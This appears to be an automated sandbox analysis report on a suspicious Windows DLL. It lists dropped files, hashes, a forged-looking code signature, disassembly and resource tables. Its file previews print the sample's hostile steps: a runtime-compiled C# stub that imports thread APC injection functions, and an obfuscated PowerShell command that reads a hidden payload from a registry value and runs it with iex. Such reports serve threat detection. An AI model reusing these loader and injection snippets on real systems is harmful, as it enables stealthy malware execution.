                            Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\m501nuko\m501nuko.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\m501nuko\m501nuko.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                            C:\Users\user\AppData\Local\Temp\wnczrnms\CSC2E55B817A1C42F79C3F14C28684A599.TMP
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:MSVC .res
                            Category:dropped
                            Size (bytes):652
                            Entropy (8bit):3.0882008464403055
                            Encrypted:false
                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryC5ak7YnqqPOPN5Dlq5J:+RI+ycuZhN05akSPOPNnqX
                            MD5:B6905AF467395A55B06B7D723D6F9071
                            SHA1:DE3FE20DBDC687C7434A1C7598C3EE0CFBBA6ECA
                            SHA-256:6024F928917A5852278333793A6AC3BB6742E86C4F0095B7467BA1E148AB32B6
                            SHA-512:066A42CA9AABF4DF85EAF3B698E80D21F512CDA444C59FA46AA3FE478CDCA0E7998806C08B98CFA2069BA98137984EE352C3C715166DBD04123AB094E42C97E6
                            Malicious:false
                            Reputation:unknown
                            Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.n.c.z.r.n.m.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.n.c.z.r.n.m.s...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                            C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.0.cs
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text
                            Category:dropped
                            Size (bytes):414
                            Entropy (8bit):5.049516587690195
                            Encrypted:false
                            SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                            MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                            SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                            SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                            SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                            Malicious:false
                            Reputation:unknown
                            Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yarnha. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);.. }..}.
                            C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):375
                            Entropy (8bit):5.17577930886851
                            Encrypted:false
                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723f97Gzxs7+AEszIN723f97V9:p37Lvkmb6K2a9GWZETa9V9
                            MD5:5A76B660E832AA581281D58BC7BAA5A2
                            SHA1:024250002F01662F9AB2370CF4033EA8487665B6
                            SHA-256:B60360D322E1A93A5509DB4EEA774C5FB09F2D2A8B1B92B51D8385E54B872276
                            SHA-512:4461492B81B48FB437055C992CCC555371D16DF08788E6D3AB7512019A7B483D8772D9A3D1192A956736A96A8B0A02B2D3FDD68D84F2EAC82A4B38E95F7BA63E
                            Malicious:false
                            Reputation:unknown
                            Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.0.cs"
                            C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.dll
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):3584
                            Entropy (8bit):2.635212339978853
                            Encrypted:false
                            SSDEEP:24:etGSN8+mUE7R85z7woel/gE4/eiDPtkZfKGpsDZ0WI+ycuZhN05akSPOPNnq:6DXE7S5gG6iyJKGpCZX1ulua3Kq
                            MD5:EF9522EB6C3500384C36EE79C184EC6B
                            SHA1:FE4AF6485B4A01629F901F753C3DC2D064683718
                            SHA-256:527F9A7FF12525547D21900A699B9BCDADD1C109A11EFDF624411C2E3FEA6C1A
                            SHA-512:7EBD29BDE63276534B24AB60DC274D5D473ED13B20F2AD30B74740D993D9F5C6AAD81F72DC8FA3C42CBA714C3E27B414D5985D2DB617CC68D611DE5A3D7D62EE
                            Malicious:false
                            Reputation:unknown
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                            C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.out
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                            Category:modified
                            Size (bytes):872
                            Entropy (8bit):5.293151646200869
                            Encrypted:false
                            SSDEEP:24:AId3ka6K2axETa34KaM5DqBVKVrdFAMBJTH:Akka6CxE+oKxDcVKdBJj
                            MD5:5F3A49EA202366DDFA9816641C833803
                            SHA1:A7BA847BF2CA2BB118F71E6F12BB879B0DA52F29
                            SHA-256:227DF3C5AF341B067B565D4E0BC9C6555F1CCDD660020007014D5DD7C124419B
                            SHA-512:C3E4270BBA10C2213BF049A0A5D6447496D9406848A2C9D2A8BF882F691F4831689E0E10B3A3959464298CC4F7F77FAE6893EB6C4E5035B382C82CDD5D49B9FB
                            Malicious:false
                            Reputation:unknown
                            Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                            C:\Users\user\Documents\20211214\PowerShell_transcript.088753.0fmmIESA.20211214102149.txt
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1379
                            Entropy (8bit):5.379442550983847
                            Encrypted:false
                            SSDEEP:24:BxSAPRN7vBVLVvx2DOXUW+nELCHu4XWDUHjeTKKjX4CIym1ZJXXRenELCHu4S3eP:BZP/vTLVvoOmbu4GYqDYB1Z9gbu4SAZx
                            MD5:D55F220D9892547788887A8A32831118
                            SHA1:1B02881E135C7C81C2D3838A7961A121E7187DD5
                            SHA-256:7F26B4B3D12B445417AEF015E2BE4048848B6D814FE8466848C0B69AFA2272AB
                            SHA-512:858D5CBE3793B79BE8BACCA705F9EA92D39507171ADA3B09FAA71382374AC0A1C719674DB4D7A7BCE8B69BFCACC1CAECDBD7FC97BC6E6CF2FBE655EF08FCDEA3
                            Malicious:false
                            Reputation:unknown
                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214102153..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 088753 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 5784..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214102153..**********************..PS>new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value
                            C:\Users\user\Documents\20211214\PowerShell_transcript.088753.C1OhZlCs.20211214102152.txt
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1379
                            Entropy (8bit):5.383650096362091
                            Encrypted:false
                            SSDEEP:24:BxSAPRN7vBVLVvx2DOXUW+nELCHu4XW6HjeTKKjX4CIym1ZJXXRenELCHu4SDmnu:BZP/vTLVvoOmbu4G6qDYB1Z9gbu4SDou
                            MD5:68350C66B532BFF0B584D247AD24F0D5
                            SHA1:CE1EB6152EE292AFDCBAE05C7057BAEB61FB2996
                            SHA-256:88CB4539138955AB926F559B2692348F63792A4ED0EE8B30ACE747FB404ECC94
                            SHA-512:80CE793621A577D179F6F633C97D8B39A8EBB79C1E50EFF57EA02BEEBDDD0F320DE6B314913CE7A40077CAE8023957747004AF9C1D9F98E280664CD2822D0828
                            Malicious:false
                            Reputation:unknown
                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214102153..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 088753 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 6444..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214102153..**********************..PS>new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value
                            C:\Users\user\Documents\20211214\PowerShell_transcript.088753.a52niw8E.20211214102148.txt
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1379
                            Entropy (8bit):5.383634787556345
                            Encrypted:false
                            SSDEEP:24:BxSAPRN7vBVLVvx2DOXUW+nELCHu4XWGHjeTKKjX4CIym1ZJXXRenELCHu4SQDnR:BZP/vTLVvoOmbu4GGqDYB1Z9gbu4SQDR
                            MD5:19F594408E907A61AD2F2145D3840483
                            SHA1:FBFD6B66842B9D146C8B200852764C5FF0FDF33E
                            SHA-256:E7AC349B39C99824312EF83330E3D1EE270DDCF84B0C20C4FDC24C35F4EA3523
                            SHA-512:4FBDF2CBBC63FCED8296EB738DADA7BBD616759859847D127A8680A9209FD91AB060FD95A441079853857E15E156D3863BE944E74390436885E3F19E7ED5B6E1
                            Malicious:false
                            Reputation:unknown
                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214102153..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 088753 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 6448..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214102153..**********************..PS>new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value
                            C:\Users\user\Documents\20211214\PowerShell_transcript.088753.emLoLZBh.20211214102148.txt
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1379
                            Entropy (8bit):5.38423662326416
                            Encrypted:false
                            SSDEEP:24:BxSAPRN7vBVLVvx2DOXUW+nELCHu4XWF3HjeTKKjX4CIym1ZJXXRenELCHu4S/nI:BZP/vTLVvoOmbu4GF3qDYB1Z9gbu4SPI
                            MD5:DB43AE7808126FE5E4B988C75C7F8F7E
                            SHA1:D4A787EA3FDCD788BC0620482E9B5851802B46C7
                            SHA-256:8E28E9B5EE4C6FF29D3D1F2763EE64BC8E4E6C04264DE5895EE56861225E6760
                            SHA-512:2CE1A34F9A696E42D61D69E37C958E2412229E07B62CABEFBEE1743D1FD59F13F248A94DEEDEC5711E5F5E3DD4067C8E861B5F7569D4F25F4567B115D74F06D4
                            Malicious:false
                            Reputation:unknown
                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214102153..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 088753 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 5640..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214102153..**********************..PS>new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value

                            Static File Info

                            General

                            File type:MS-DOS executable, MZ for MS-DOS
                            Entropy (8bit):5.271216262919323
                            TrID:
                            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                            • Generic Win/DOS Executable (2004/3) 0.20%
                            • DOS Executable Generic (2002/1) 0.20%
                            • VXD Driver (31/22) 0.00%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:61b85f75e6a7c.dll
                            File size:1781920
                            MD5:26788bdf519813ff2600570a5c8e23d9
                            SHA1:44f22a053e84cd7afcf34a4fa19dbf512c8a624d
                            SHA256:25f74513f1f0a72453bf096337daba7268bf77371f7fc210f56672f52b7b3af1
                            SHA512:54cad6bdd1ef350a02e6e3645db3fc3f1fadb385c7dcf5eeacf20a8b1d7fbc42aa3cb88d320fda63a7224b2507e7b84e3942cb54fb61cc398800ec95f6f2d505
                            SSDEEP:49152:dOMY8UQw8MT8UQw8MT8UQw8MT8UQw8MT8UQw8MT8UQw8Mc:9Y8UQw8MT8UQw8MT8UQw8MT8UQw8MT8Z
                            File Content Preview:MZ......................................................................!..L.!This .ro.ra. cannot be run in DOS m.de....$.......PE..L...[..a...........!....................................................................................................V..

                            File Icon

                            Icon Hash:82b0f4c6d2c66cb1

                            Static PE Info

                            General

                            Entrypoint:0x1001f3fe
                            Entrypoint Section:.text
                            Digitally signed:true
                            Imagebase:0x10000000
                            Subsystem:windows gui
                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                            DLL Characteristics:
                            Time Stamp:0x61B6D25B [Mon Dec 13 04:55:55 2021 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:90a569c76737ac6eae14ae164dabea89

                            Authenticode Signature

                            Signature Valid:false
                            Signature Issuer:CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
                            Signature Validation Error:The digital signature of the object did not verify
                            Error Number:-2146869232
                            Not Before, Not After
                            • 10/1/2020 5:00:00 PM 12/18/2023 4:00:00 AM
                            Subject Chain
                            • CN=OpenJS Foundation, O=OpenJS Foundation, L=San Francisco, S=California, C=US
                            Version:3
                            Thumbprint MD5:8E8056A2284F0304445ED325353454BF
                            Thumbprint SHA-1:E16BB6EE4ED3935C46C356D147E811286BA4BBFE
                            Thumbprint SHA-256:968F9536C18A4475095B37792855AA62306275DEC05BD72F21653C98026CFC4E
                            Serial:038EDB2FC6E405731A760F1516144C85

                            Entrypoint Preview

                            Instruction
                            mov ebx, edi
                            or ebx, edi
                            jmp 00007FA47086A232h
                            ret
                            ret
                            pop ecx
                            push esi
                            pop ebx
                            ret
                            mov edi, dword ptr [1000335Ch]
                            call 00007FA470869118h
                            mov esp, dword ptr [ebp-18h]
                            mov word ptr [100030FCh], es
                            mov ecx, dword ptr [ebp-04h]
                            lea ebp, dword ptr [esp+10h]
                            int3
                            int3
                            push ebp
                            push edi
                            mov dword ptr [10003120h], eax
                            push eax
                            je 00007FA470868E06h
                            int3
                            mov dword ptr fs:[00000000h], ecx
                            mov eax, dword ptr [ebp+0Ch]
                            mov ecx, edi
                            push eax
                            jmp dword ptr [100040BCh]
                            add ecx, eax
                            mov eax, dword ptr [ecx]
                            cmp edi, ecx
                            mov eax, dword ptr [ecx]
                            push 10000000h
                            mov eax, dword ptr [ebp-14h]
                            push 00000000h
                            push 1001E268h
                            ret
                            xor esi, esi
                            xor esi, esi
                            xor esi, esi
                            pop eax
                            int3
                            int3
                            int3
                            mov esp, dword ptr [ebp-18h]
                            int3
                            jmp dword ptr [10004078h]
                            pop ebx
                            sete cl
                            call 00007FA470868CC3h
                            int3
                            mov ecx, edi
                            ret
                            jmp dword ptr [1000406Ch]
                            ret
                            call 00007FA4708689CCh
                            int3
                            int3
                            mov word ptr [100030F8h], fs
                            cmp dword ptr [10003010h], 00000000h
                            int3
                            int3
                            int3
                            call 00007FA470868E8Fh
                            int3
                            int3
                            mov ebp, esp
                            push dword ptr [ebp+08h]
                            int3
                            sub al, cl
                            jmp 00007FA47086BA28h
                            int3
                            int3
                            int3
                            push eax
                            mov dword ptr [ebp-04h], eax
                            int3
                            cmp dword ptr [00000000h], 00000000h

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x1cff00x56.text
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x43d040xb4.data
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x16f8e8.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x1b18000x18a0.rsrc
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1b70000x6ec.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x28d060x27c.data
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x26ec00x24800False0.51682229238data5.5020241716IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            .data0x280000x1e4fe0x1be00False0.0578843189462data6.07273076569IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            .rsrc0x470000x16f8e80x16fa00False0.218529518021data4.81717219526IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x1b70000x6ec0x800False0.75data6.07315256741IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountry
                            RT_ICON0x4af700x668dataEnglishUnited States
                            RT_ICON0x4b5d80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                            RT_ICON0x4b8c00x1e8dataEnglishUnited States
                            RT_ICON0x4baa80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x4bbd00xea8dataEnglishUnited States
                            RT_ICON0x4ca780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                            RT_ICON0x4d3200x6c8dataEnglishUnited States
                            RT_ICON0x4d9e80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x4df500x25a8dataEnglishUnited States
                            RT_ICON0x504f80x10a8dataEnglishUnited States
                            RT_ICON0x515a00x988dataEnglishUnited States
                            RT_ICON0x51f280x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x523900x12428dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963EnglishUnited States
                            RT_ICON0x647b80x4c28dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832EnglishUnited States
                            RT_ICON0x693e00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823EnglishUnited States
                            RT_ICON0x6d6080x25a8dataEnglishUnited States
                            RT_ICON0x6fbb00x10a8dataEnglishUnited States
                            RT_ICON0x70c580xeb0dataEnglishUnited States
                            RT_ICON0x71b080x988dataEnglishUnited States
                            RT_ICON0x724900x6b8dataEnglishUnited States
                            RT_ICON0x72b480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x72fb00x668dataEnglishUnited States
                            RT_ICON0x736180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                            RT_ICON0x739000x1e8dataEnglishUnited States
                            RT_ICON0x73ae80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x73c100xea8dataEnglishUnited States
                            RT_ICON0x74ab80x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                            RT_ICON0x753600x6c8dataEnglishUnited States
                            RT_ICON0x75a280x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x75f900x25a8dataEnglishUnited States
                            RT_ICON0x785380x10a8dataEnglishUnited States
                            RT_ICON0x795e00x988dataEnglishUnited States
                            RT_ICON0x79f680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x7a3d00x668dataEnglishUnited States
                            RT_ICON0x7aa380x2e8dataEnglishUnited States
                            RT_ICON0x7ad200x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x7ae480xea8dataEnglishUnited States
                            RT_ICON0x7bcf00x8a8dataEnglishUnited States
                            RT_ICON0x7c5980x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x7cb000x452ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                            RT_ICON0x810300x25a8dataEnglishUnited States
                            RT_ICON0x835d80x10a8dataEnglishUnited States
                            RT_ICON0x846800x988dataEnglishUnited States
                            RT_ICON0x850080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x854700x668dataEnglishUnited States
                            RT_ICON0x85ad80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                            RT_ICON0x85dc00x1e8dataEnglishUnited States
                            RT_ICON0x85fa80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x860d00xea8dataEnglishUnited States
                            RT_ICON0x86f780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                            RT_ICON0x878200x6c8dataEnglishUnited States
                            RT_ICON0x87ee80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x884500x25a8dataEnglishUnited States
                            RT_ICON0x8a9f80x10a8dataEnglishUnited States
                            RT_ICON0x8baa00x988dataEnglishUnited States
                            RT_ICON0x8c4280x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x8c8900x12428dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963EnglishUnited States
                            RT_ICON0x9ecb80x4c28dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832EnglishUnited States
                            RT_ICON0xa38e00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823EnglishUnited States
                            RT_ICON0xa7b080x25a8dataEnglishUnited States
                            RT_ICON0xaa0b00x10a8dataEnglishUnited States
                            RT_ICON0xab1580xeb0dataEnglishUnited States
                            RT_ICON0xac0080x988dataEnglishUnited States
                            RT_ICON0xac9900x6b8dataEnglishUnited States
                            RT_ICON0xad0480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xad4b00x668dataEnglishUnited States
                            RT_ICON0xadb180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                            RT_ICON0xade000x1e8dataEnglishUnited States
                            RT_ICON0xadfe80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xae1100xea8dataEnglishUnited States
                            RT_ICON0xaefb80x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                            RT_ICON0xaf8600x6c8dataEnglishUnited States
                            RT_ICON0xaff280x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xb04900x25a8dataEnglishUnited States
                            RT_ICON0xb2a380x10a8dataEnglishUnited States
                            RT_ICON0xb3ae00x988dataEnglishUnited States
                            RT_ICON0xb44680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xb48d00x668dataEnglishUnited States
                            RT_ICON0xb4f380x2e8dataEnglishUnited States
                            RT_ICON0xb52200x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xb53480xea8dataEnglishUnited States
                            RT_ICON0xb61f00x8a8dataEnglishUnited States
                            RT_ICON0xb6a980x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xb70000x452ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                            RT_ICON0xbb5300x25a8dataEnglishUnited States
                            RT_ICON0xbdad80x10a8dataEnglishUnited States
